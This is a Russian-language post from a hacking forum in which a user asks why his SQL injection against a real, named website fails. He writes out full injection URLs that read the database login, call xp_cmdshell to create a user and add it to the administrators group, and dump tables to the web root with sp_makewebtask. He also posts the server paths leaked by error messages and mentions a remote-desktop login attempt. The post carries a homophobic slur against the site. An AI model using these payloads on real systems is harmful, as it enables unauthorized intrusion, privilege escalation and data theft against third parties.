HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу mssql inj вопрос для гуру
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

mssql inj вопрос для гуру
  #1  
Старый 24.07.2007, 23:56
$jason$
Новичок
Регистрация: 12.04.2006
Сообщений: 22
С нами: 10569197

Репутация: 3
По умолчанию mssql inj вопрос для гуру
Здравствуйте помогите понять почему неработают некоторые фишки mssql
для примера взял инъекцию на сайте пидоров
Цитата:
http://cybersocket.com/current/current.cfm?issue_id=-1'
тут sql-inj с правами sa
Цитата:
http://cybersocket.com/current/current.cfm?issue_id=system_user
Syntax error converting the nvarchar value 'sa' to a column of data type int.

хочу добавить юзера через xp_cmdshell

Цитата:
http://cybersocket.com/current/current.cfm?issue_id=1;exec%20master..xp_cmdshell% 20'net%20user%20test1%20hacker%20/add';--
Цитата:
http://cybersocket.com/current/current.cfm?issue_id=1;exec%20master..xp_cmdshell% 20'net%20localgroup%20administrators%20test1%20/add';--
выдаёт Incorrect syntax near 'net'.
что я делаю неправильно в этом случае? xp_cmdshell вроде неотключён и должно всё сработать а недобавляет юзера коннекчусь к серваку через удалённый рабочий стол и говорит логин пасс неверный

пробую зделать дамп таблиц через sp_makewebtask

Цитата:
http://cybersocket.com/current/current.cfm?issue_id=1;%20EXEC%20master..sp_makewe btask%20%22C:\Inetpub\wwwroot\www.cybersocket.com\ includes\output.html%22,%22SELECT%20*%20FROM%20%20 %20%20INFORMATION_SCHEMA.TABLES%22;--
тоже неполучается,пробовал и в расшаренную папку на удалённом сервере и тоже облом

Incorrect syntax near the keyword 'order'.

тут что я нетак делаю?

путьдо веб директории в ошибке взял
Error Executing Database Query.
[Macromedia][SQLServer JDBC Driver][SQLServer]Incorrect syntax near the keyword 'order'.

The error occurred in C:\Inetpub\wwwroot\www.cybersocket.com\includes\qr y_get_article_id.cfm: line 17
Called from C:\Inetpub\wwwroot\www.cybersocket.com\current\cur rent.cfm: line 1
Called from C:\Inetpub\wwwroot\www.cybersocket.com\includes\qr y_get_article_id.cfm: line 17
Called from C:\Inetpub\wwwroot\www.cybersocket.com\current\cur rent.cfm: line 1

P.S. как узнавать таблицы и колонки+инфу в них я знаю и как сливать построчно тоже,меня интересуют способы именно через xp_cmdshell , sp_makewebtask и другие примочки mssql когда есть права sa
𝕏 Twitter Reddit Telegram Копировать ссылку
 
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.